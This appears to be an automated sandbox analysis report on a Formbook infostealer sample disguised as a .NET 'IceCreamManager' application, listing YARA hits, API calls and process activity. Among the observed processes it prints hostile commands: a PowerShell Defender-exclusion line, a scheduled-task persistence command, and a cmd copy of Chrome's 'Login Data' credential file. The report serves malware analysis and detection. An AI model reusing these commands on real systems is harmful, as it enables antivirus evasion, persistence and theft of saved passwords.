Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0096BA77 0_2_0096BA77
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_01344139 0_2_01344139
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_01344148 0_2_01344148
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0134EDF0 0_2_0134EDF0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0134EDE0 0_2_0134EDE0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0134DA1C 0_2_0134DA1C
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D4713 0_2_075D4713
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D85C0 0_2_075D85C0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D0040 0_2_075D0040
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D7970 0_2_075D7970
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D18D8 0_2_075D18D8
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_075D0006 0_2_075D0006
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_07841398 0_2_07841398
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0784B848 0_2_0784B848
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_07840F61 0_2_07840F61
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_07840F70 0_2_07840F70
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_07842580 0_2_07842580
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 0_2_0784256F 0_2_0784256F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 8_2_002FBA77 8_2_002FBA77
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00401030 12_2_00401030
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0040927B 12_2_0040927B
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00409280 12_2_00409280
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0040DC20 12_2_0040DC20
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00402D8F 12_2_00402D8F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00402D90 12_2_00402D90
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041D78F 12_2_0041D78F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_00402FB0 12_2_00402FB0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041E7BB 12_2_0041E7BB
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0059BA77 12_2_0059BA77
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AD466 21_2_046AD466
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F841F 21_2_045F841F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B1D55 21_2_046B1D55
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B2D07 21_2_046B2D07
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E0D20 21_2_045E0D20
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B25DD 21_2_046B25DD
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FD5E0 21_2_045FD5E0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612581 21_2_04612581
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04606E30 21_2_04606E30
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AD616 21_2_046AD616
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B2EF7 21_2_046B2EF7
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B1FF1 21_2_046B1FF1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046BDFCE 21_2_046BDFCE
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046BE824 21_2_046BE824
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A830 21_2_0460A830
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A1002 21_2_046A1002
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B28EC 21_2_046B28EC
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046120A0 21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B20A8 21_2_046B20A8
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FB090 21_2_045FB090
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04604120 21_2_04604120
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EF900 21_2_045EF900
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469FA2B 21_2_0469FA2B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B22AE 21_2_046B22AE
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460AB40 21_2_0460AB40
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B2B28 21_2_046B2B28
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A03DA 21_2_046A03DA
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046ADBD2 21_2_046ADBD2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461ABD8 21_2_0461ABD8
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461EBB0 21_2_0461EBB0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0060927B 21_2_0060927B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00609280 21_2_00609280
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0060DC20 21_2_0060DC20
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00602D8F 21_2_00602D8F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00602D90 21_2_00602D90
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_00602FB0 21_2_00602FB0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061E7BB 21_2_0061E7BB
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 045EB150 appears 87 times
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041A310 NtCreateFile, 12_2_0041A310
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041A3C0 NtReadFile, 12_2_0041A3C0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041A440 NtClose, 12_2_0041A440
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041A4F0 NtAllocateVirtualMemory, 12_2_0041A4F0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0041A30C NtCreateFile, 12_2_0041A30C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629540 NtReadFile,LdrInitializeThunk, 21_2_04629540
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046295D0 NtClose,LdrInitializeThunk, 21_2_046295D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629660 NtAllocateVirtualMemory,LdrInitializeThunk, 21_2_04629660
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629650 NtQueryValueKey,LdrInitializeThunk, 21_2_04629650
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629610 NtEnumerateValueKey,LdrInitializeThunk, 21_2_04629610
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046296E0 NtFreeVirtualMemory,LdrInitializeThunk, 21_2_046296E0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046296D0 NtCreateKey,LdrInitializeThunk, 21_2_046296D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629710 NtQueryInformationToken,LdrInitializeThunk, 21_2_04629710
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629FE0 NtCreateMutant,LdrInitializeThunk, 21_2_04629FE0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629780 NtMapViewOfSection,LdrInitializeThunk, 21_2_04629780
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629860 NtQuerySystemInformation,LdrInitializeThunk, 21_2_04629860
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629840 NtDelayExecution,LdrInitializeThunk, 21_2_04629840
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629910 NtAdjustPrivilegesToken,LdrInitializeThunk, 21_2_04629910
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046299A0 NtCreateSection,LdrInitializeThunk, 21_2_046299A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629A50 NtCreateFile,LdrInitializeThunk, 21_2_04629A50
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629560 NtWriteFile, 21_2_04629560
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629520 NtWaitForSingleObject, 21_2_04629520
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462AD30 NtSetContextThread, 21_2_0462AD30
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046295F0 NtQueryInformationFile, 21_2_046295F0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629670 NtQueryInformationProcess, 21_2_04629670
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629760 NtOpenProcess, 21_2_04629760
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462A770 NtOpenThread, 21_2_0462A770
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629770 NtSetInformationFile, 21_2_04629770
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629730 NtQueryVirtualMemory, 21_2_04629730
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462A710 NtOpenProcessToken, 21_2_0462A710
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046297A0 NtUnmapViewOfSection, 21_2_046297A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462B040 NtSuspendThread, 21_2_0462B040
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629820 NtEnumerateKey, 21_2_04629820
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046298F0 NtReadVirtualMemory, 21_2_046298F0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046298A0 NtWriteVirtualMemory, 21_2_046298A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629950 NtQueueApcThread, 21_2_04629950
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046299D0 NtCreateProcessEx, 21_2_046299D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629A20 NtResumeThread, 21_2_04629A20
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629A00 NtProtectVirtualMemory, 21_2_04629A00
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629A10 NtQuerySection, 21_2_04629A10
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629A80 NtOpenDirectoryObject, 21_2_04629A80
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04629B00 NtSetValueKey, 21_2_04629B00
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462A3B0 NtGetContextThread, 21_2_0462A3B0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061A310 NtCreateFile, 21_2_0061A310
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061A3C0 NtReadFile, 21_2_0061A3C0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061A440 NtClose, 21_2_0061A440
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061A4F0 NtAllocateVirtualMemory, 21_2_0061A4F0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0061A30C NtCreateFile, 21_2_0061A30C
Source: iuvRyl9i7D.exe Binary or memory string: OriginalFilename vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.301765758.00000000075A0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameFort.dll" vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.294702301.0000000000962000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFort.dll" vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.301821423.0000000007770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe Binary or memory string: OriginalFilename vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000008.00000000.287142892.00000000002F2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe Binary or memory string: OriginalFilename vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000000.292903741.0000000000592000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000002.369531505.0000000002EC5000.00000040.10000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCONTROL.EXEj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000002.369137494.00000000012DF000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000003.296040440.0000000000FB4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000003.293928699.0000000000E0C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: dDqpEdJEtzi.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: iuvRyl9i7D.exe Virustotal: Detection: 23%
Source: iuvRyl9i7D.exe ReversingLabs: Detection: 19%
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File read: C:\Users\user\Desktop\iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe "C:\Users\user\Desktop\iuvRyl9i7D.exe"
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File created: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File created: C:\Users\user\AppData\Local\Temp\tmp280F.tmp
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/9@7/6
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5132:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_01
Source: iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 2017 JIYUKOBO Ltd. All Rights Reserved.slnt
Source: iuvRyl9i7D.exe String found in binary or memory: BatchTabLayout#tableLayoutPanel4+ProcessEndOfDayButton!!ProcessEndOfDay1LoadTruckRouteFileButton'!LoadTruckRouteFile3LoadTruckDriverFileButton)!LoadTruckDriverFileOLoadOverallInventoryExtensionFileButtonE!LoadOverallInventoryExtensionFile=LoadOverallInventoryFileButton3!LoadOverallInventoryFile9LoadTruckInventoryFileButton/!LoadTruckInventoryFile/LoadTruckFuelFileButton%!LoadTruckFuelFile'LoadTruckFileButton
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: iuvRyl9i7D.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: iuvRyl9i7D.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: iuvRyl9i7D.exe, 0000000C.00000002.367819402.0000000001030000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.293737244.0000000000CF6000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 0000000C.00000003.295538463.0000000000E95000.00000004.00000800.00020000.00000000.sdmp, control.exe, control.exe, 00000015.00000002.510584638.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.369065913.0000000004422000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000002.510860995.00000000046DF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000015.00000003.367541809.0000000000B0D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: control.pdbUGP source: iuvRyl9i7D.exe, 0000000C.00000002.369490958.0000000002EC0000.00000040.10000000.00040000.00000000.sdmp

Data Obfuscation

Source: iuvRyl9i7D.exe, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: dDqpEdJEtzi.exe.0.dr, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.iuvRyl9i7D.exe.960000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.2.iuvRyl9i7D.exe.2f0000.0.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 8.0.iuvRyl9i7D.exe.2f0000.1.unpack, IceCreamManager/View/MainForm.cs .Net Code: iiiii System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
